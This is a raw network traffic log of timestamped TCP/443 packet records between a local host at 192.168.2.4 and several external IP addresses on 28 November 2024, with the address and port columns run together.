                                                                                                                                          Nov 28, 2024 11:32:59.048450947 CET49811443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:59.048458099 CET4434981120.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.051331997 CET443498125.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.067426920 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.067502975 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.070346117 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.070405960 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.076289892 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.076361895 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.080271959 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.080359936 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.082360029 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.082433939 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.087958097 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.088032961 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.092889071 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.092971087 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.096635103 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.096712112 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.099746943 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.099839926 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.104403019 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.104468107 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.108692884 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.108762980 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.113711119 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.113781929 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.117584944 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.117649078 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.175013065 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.175164938 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.177783012 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.177870989 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.180871010 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.180928946 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.240158081 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.240386963 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.240408897 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.240909100 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.240969896 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.241833925 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.241883993 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.242054939 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.242139101 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.242212057 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.242238045 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.242244005 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.242328882 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.254210949 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.254398108 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.254412889 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.254750967 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.254807949 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.255354881 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.255418062 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.255567074 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.255623102 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.255742073 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.255757093 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.257323027 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.257388115 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.260993958 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.261049986 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.263672113 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.263730049 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.266603947 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.266673088 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.270216942 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.270277977 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.273170948 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.273232937 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.275821924 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.275890112 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.278903008 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.278960943 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.282088995 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.282156944 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.284893036 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.284954071 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.288167953 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.288240910 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.290862083 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.290923119 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.293818951 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.293885946 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.307251930 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.366002083 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.366090059 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.368325949 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.368393898 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.371908903 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.371970892 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.448802948 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.448920012 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.451503992 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.451567888 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.453933001 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.453990936 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.456343889 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.456403971 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.458697081 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.458782911 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.462050915 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.462114096 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.464356899 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.464418888 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.466768026 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.466826916 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.469990015 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.470056057 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.472378016 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.472440958 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.475277901 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.475337029 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.477740049 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.477803946 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.480066061 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.480134964 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.482620955 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.483031034 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.527282953 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.527324915 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.527394056 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.527426004 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.555183887 CET443498125.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.555247068 CET443498125.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.556226969 CET49812443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.556438923 CET49812443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.556449890 CET443498125.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.556874990 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.556895971 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.556962013 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.558224916 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.558237076 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.561285019 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.561310053 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.561383009 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.561584949 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.561595917 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.562982082 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.563049078 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.565721989 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.565794945 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.567935944 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.568001032 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.573523998 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.600806952 CET443498145.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.600838900 CET443498145.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.600899935 CET49814443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.600917101 CET443498145.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.600970984 CET49814443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.602469921 CET49814443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.602499008 CET443498145.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.602667093 CET443498145.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.602724075 CET49814443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.602741003 CET49814443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.602790117 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.602799892 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.602850914 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.603739977 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.603751898 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.605691910 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.605707884 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.605778933 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.605967045 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.605982065 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.612864017 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.612876892 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.612938881 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.642079115 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.642162085 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.645243883 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.645309925 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.647835016 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.647922039 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.650322914 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.650387049 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.653254986 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.653322935 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.655684948 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.655755043 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.658195972 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.658271074 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.660614014 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.660691977 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.663742065 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.663820028 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.665837049 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.665904045 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.669420958 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.669504881 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.671926975 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.671993017 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.673921108 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.674000978 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.708548069 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.708647013 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.736953020 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.737034082 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.754534960 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.754693031 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.757054090 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.757137060 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.757147074 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.757316113 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.757333994 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.757355928 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.757405043 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.762099981 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.762192011 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.802309990 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.802426100 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.824269056 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.824373007 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.824892044 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.824929953 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.825005054 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.825027943 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.828598022 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.829050064 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.829060078 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.829458952 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.833182096 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.833209038 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.833245039 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.833262920 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.833270073 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.833283901 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.833333015 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.833499908 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.833620071 CET49816443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.833637953 CET443498165.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.834198952 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.834223032 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.834229946 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.834259987 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.834290981 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.834301949 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.834327936 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.851551056 CET49829443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.851598978 CET443498295.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.851676941 CET49829443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.852232933 CET49829443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.852251053 CET443498295.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.875334978 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.886543036 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.903664112 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.903733969 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.913156986 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.913168907 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.913192987 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.913223982 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.913245916 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.918093920 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.918180943 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.932048082 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.932136059 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.945164919 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.945230961 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.958947897 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.959027052 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:59.967012882 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:59.967082977 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.016546965 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.016642094 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.023941040 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.024013042 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.028235912 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.028245926 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.028328896 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.061674118 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.061681986 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.061784029 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.086997032 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.087006092 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.087102890 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.092262030 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.092355967 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.092390060 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.092411995 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.092736006 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.092751026 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.123759031 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.123766899 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.123874903 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.144736052 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.144743919 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.144922972 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.173472881 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.174072027 CET49823443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.174137115 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.174562931 CET49823443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.174582005 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.174748898 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.175000906 CET49822443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.175021887 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.175529957 CET49822443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.175535917 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.243134975 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.243259907 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.260272026 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.260389090 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.276629925 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.276701927 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.291699886 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.291795015 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.300445080 CET4434982413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.300951958 CET49824443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.300970078 CET4434982413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.301415920 CET49824443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.301420927 CET4434982413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.301826000 CET4434982113.107.246.63192.168.2.4
